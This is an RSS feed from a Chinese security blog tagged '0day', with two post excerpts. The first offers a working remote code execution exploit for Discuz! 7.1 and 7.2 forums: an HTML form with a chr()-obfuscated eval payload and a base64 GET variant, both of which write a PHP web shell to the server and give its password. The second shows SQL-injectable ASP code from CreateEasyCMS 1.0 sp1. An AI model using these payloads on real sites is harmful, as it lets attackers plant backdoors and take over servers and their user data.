<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Alxston Blog ｜小童De部落 &#187; 0day</title>
	<atom:link href="http://www.alxston.com/post/tag/0day/feed" rel="self" type="application/rss+xml" />
	<link>http://www.alxston.com</link>
	<description>临渊羡渔，不如退而结网---Alxston Blog &#38;小童De部落</description>
	<lastBuildDate>Mon, 26 Dec 2011 02:07:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>最新Discuz! 7.1 &amp; 7.2  的 exp 0day</title>
		<link>http://www.alxston.com/post/804.html</link>
		<comments>http://www.alxston.com/post/804.html#comments</comments>
		<pubDate>Thu, 07 Jan 2010 04:47:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Oday]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[7.2]]></category>
		<category><![CDATA[Discuz7.1]]></category>
		<category><![CDATA[最新]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=804</guid>
		<description><![CDATA[先看我和X.DW一起搞的一个香港站! (点击放大图片) 漏洞呢.其实1月5号时我知道了&#8230;..网上也公开速度很快!一直没有去下手做,正好听X.DW说他搞了几个站&#8230;所以我也研究了一下! 首先感谢WJS和冰冷的太阳，老君分析过了，我就不多说了，使用exp的话仅限本机测试，其他用途后果自负！ 第一种方法： 先注册个用户然后把 &#60;form method=”post” action=” http://www.xxx.com/bbs/misc.php” enctype=”multipart/form-data”&#62; 帖子ID，指定一个存在的帖子即可：&#60;input type=”text” name=”tid” value=”1&#8243; /&#62; &#60;input type=”hidden” name=”action” value=”imme_binding” /&#62; &#60;input type=”hidden” name=”response[result]” value=”1:2&#8243; /&#62; &#60;input type=”hidden” name=”scriptlang[1][2]” value=”${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102). chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117). chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101). chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95). chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41). chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108). chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41). chr(63).chr(62).chr(39).chr(41).chr(59))}}” /&#62; &#60;input type=”submit” name=”topicsubmit” value=”提交” /&#62; &#60;/form&#62; chr解码后是：value=”${${evalfputs(fopen(&#8216;forumdata/cache/usergroup&#8217;,'w&#8217;),&#8217;&#60;?php eval($_POST[cmd])?&#62;&#8217;); 里面有个提交地址改下，保存html 打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd 第二种方法： 直接GET，利用语句： misc.php?action=imme_binding&#38;response[result]=aa:b&#38;scriptlang[aa]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(P D9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}} 在根目录生成C.PHP密码是C 临时修补方法： 在common.inc.php上面加上 [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/804.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>创易网站管理系统CreateEasyCMS 0day</title>
		<link>http://www.alxston.com/post/759.html</link>
		<comments>http://www.alxston.com/post/759.html#comments</comments>
		<pubDate>Mon, 21 Dec 2009 02:12:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Oday]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[CreateEasyCMS]]></category>
		<category><![CDATA[创易网站]]></category>
		<category><![CDATA[管理系统]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=759</guid>
		<description><![CDATA[创易网站管理系统CreateEasyCMS 0day 影响版本 1.0 sp1 存在问题的文件User\User_ChkInfo.asp 看这几句代码： view plaincopy to clipboardprint? Sub ChkMain() Dim Title,rsCheck,SQLCheck,SQLCheck2,SQLCheck3 Title=Trim(request(“TitleName”)) ChannelID=CE.ChkClng(request(“ChannelID”)) CE.GetChannelSetting(ChannelID) CE.GetModuleSetting(CE.Channel_Setting(20)) SQLCheck=”Select Top 20 InfoID,Title From CE_Info Where ChannelID=”&#38;ChannelID&#38;” and Title like &#8216;%”&#38;Title&#38;”%&#8217;” SQLCheck2=”Select Top 20 InfoID,Title,Keyword From CE_Info Where ChannelID=”&#38;ChannelID&#38;” and Keyword like &#8216;%”&#38;Title&#38;”%&#8217;” Sub ChkMain() Dim Title,rsCheck,SQLCheck,SQLCheck2,SQLCheck3 Title=Trim(request(“TitleName”)) ChannelID=CE.ChkClng(request(“ChannelID”)) CE.GetChannelSetting(ChannelID) CE.GetModuleSetting(CE.Channel_Setting(20)) SQLCheck=”Select Top 20 InfoID,Title [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/759.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

